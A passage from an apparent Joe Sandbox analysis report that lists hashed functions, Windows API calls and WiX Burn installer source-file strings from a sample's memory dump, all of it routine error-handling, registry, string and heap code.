                                                                                                                                                                                                                                                                                                  • Instruction ID: e46d4f137906518577d1d9f05934ec0ddf711109344c39558149a1b4cc3389a6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e6fd62b030a4e2d02891193cbe69d6ea27a22b69b909a70bdf07db7c80727c9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5101F9F2AC1636A7D7354AA5DC04BBB7E9AAF14760F014690FE44EA3D0DB218D9085D0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastNameUser
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2054405381-1522884404
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d881c842dae421357bab76988ce41f5e6c94e6f809c57452add3e3aca12b0a6
                                                                                                                                                                                                                                                                                                  • Instruction ID: ece4f7d6c93f68aa65b1f605e98e943c4ec0b5afc83d8abf2449f52968f5738f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d881c842dae421357bab76988ce41f5e6c94e6f809c57452add3e3aca12b0a6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F01F936A812296BD7249B95DC0AFAFBBA8BB00720F114259FC04E7281DB709E405AD5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C21F2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C21FE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,005C21CC,000001C7,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C3BD3: HeapSize.KERNEL32(00000000,?,005C21CC,000001C7,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3BE2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3662877508-3612885251
                                                                                                                                                                                                                                                                                                  • Opcode ID: ef1201d7d80c5fcf1977262bacc0ccff2084881bc3470345d6d8fa01b5679ab5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6ed3a77646ac8cfa76039a5c985d033a02ad75b1eba1870f9306c6dc3b4db63c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef1201d7d80c5fcf1977262bacc0ccff2084881bc3470345d6d8fa01b5679ab5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB31D33A64122AAFD7208EE5CC44F6B3E99BF55774F21422CFD15AB290EA71CC0096E0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,?,00000000,?,005ED148,00000000), ref: 005ED16D
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,005ED148,00000000), ref: 005ED179
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(0060B518,00000000,?,00000000,?,005ED148,00000000), ref: 005ED186
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,005ED148,00000000), ref: 005ED193
                                                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(0060B4E8,00000000,?,005ED148,00000000), ref: 005ED1A2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 260491571-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 31b2075f72b05219dbb2e0285a33f99ef70ac576dd6fb6c7544015db74d8efb7
                                                                                                                                                                                                                                                                                                  • Instruction ID: bb9d7c3ced2104788b26a99724a4bcbc1ae44c005be20fcbaddc80f5bc27f55e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31b2075f72b05219dbb2e0285a33f99ef70ac576dd6fb6c7544015db74d8efb7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F201D276440B5ADFCB35AFA6D88081AFBF9BE50711315D93EE1E652920C371A890CE60
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,005ED3EE,00000000,00000000,00000000,?), ref: 005ED1C3
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,005ED3EE,00000000,00000000,00000000,?), ref: 005ED24A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: GetProcessHeap.KERNEL32(?,000001C7,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: RtlAllocateHeap.NTDLL(00000000,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3967
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for message data, xrefs: 005ED212
                                                                                                                                                                                                                                                                                                  • NetFxChainer.cpp, xrefs: 005ED208
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2993511968-1624333943
                                                                                                                                                                                                                                                                                                  • Opcode ID: e202a30c009f336556fcc323dde1006866ae786090e57e5f0545c26277c91176
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0bd2720af669b00c29248f4e750560b83e1f7e70c9c86cdf56303f29334a2789
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e202a30c009f336556fcc323dde1006866ae786090e57e5f0545c26277c91176
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B118FB5200216EFDB199F64E885E6ABBF5FF49720B104168F9149B391C771AC10CBA4
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00605FD0,00000000,00000000,00000001), ref: 006060DF
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00605FD0,00000000,00000000,00000001), ref: 00606130
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: 8jb$dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-386354665
                                                                                                                                                                                                                                                                                                  • Opcode ID: bea63d98bc35d0f72029bfe3d55807d2f4590b0fd03a63ee4cf385b9f1b7397b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9a3904d5fd96b23b7e160e9e391c4ffe24a9b27af87801dd9cc619e6c2988641
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bea63d98bc35d0f72029bfe3d55807d2f4590b0fd03a63ee4cf385b9f1b7397b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9231F5369C062AABC7324BD9CD48F9B7ABBAF40B60F124254FD00AB291D671CD1096E0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,005F1AEC,00000000,80004004,?,005F1DF0,00000000,80004004,00000000,00000000), ref: 005F6162
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 005F61CA
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 005F61D6
                                                                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 005F61DC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_abort
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 88804580-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: aab9394894c82fd624076a26158f0ecc29fa255aa9b4851f428855143f57e59a
                                                                                                                                                                                                                                                                                                  • Instruction ID: a4c3c706f4ea5124a973a248f4360d13dcf8288be649f8f2eb8d4f75aa00a8ec
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aab9394894c82fd624076a26158f0ecc29fa255aa9b4851f428855143f57e59a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F08136144E1A67C32236356C0EF3F1E5ABBC1771B251124FB5596196FF6C98028125
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0060112B
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00601163
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3660427363-955085611
                                                                                                                                                                                                                                                                                                  • Opcode ID: 69559df6a65a1ed802ae15f7bde9dea080cb4dabae6034eb31a916bb1d66c78d
                                                                                                                                                                                                                                                                                                  • Instruction ID: bc1c8433f6478b9f7a5c2662ad6f4d1be683b66ef1cf7b9b7205b14e92e69e4c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69559df6a65a1ed802ae15f7bde9dea080cb4dabae6034eb31a916bb1d66c78d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95419732D4012ABBDB289F94CC459EFBBBBFF45350F1045A9FA11AB291D7318D118B90
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00603200
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00603230
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 298096c926d40238250e744d34265bb610c8dabd4343545026eaa15211c5c349
                                                                                                                                                                                                                                                                                                  • Instruction ID: f14368736c4008b187f7384fc05ba1449018ea6f87f305c5efa958fd6feeebfb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 298096c926d40238250e744d34265bb610c8dabd4343545026eaa15211c5c349
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F0B431182664A7C7310F84AC08FAB77AEAB80B61F258029FC0467350C7718F1196D0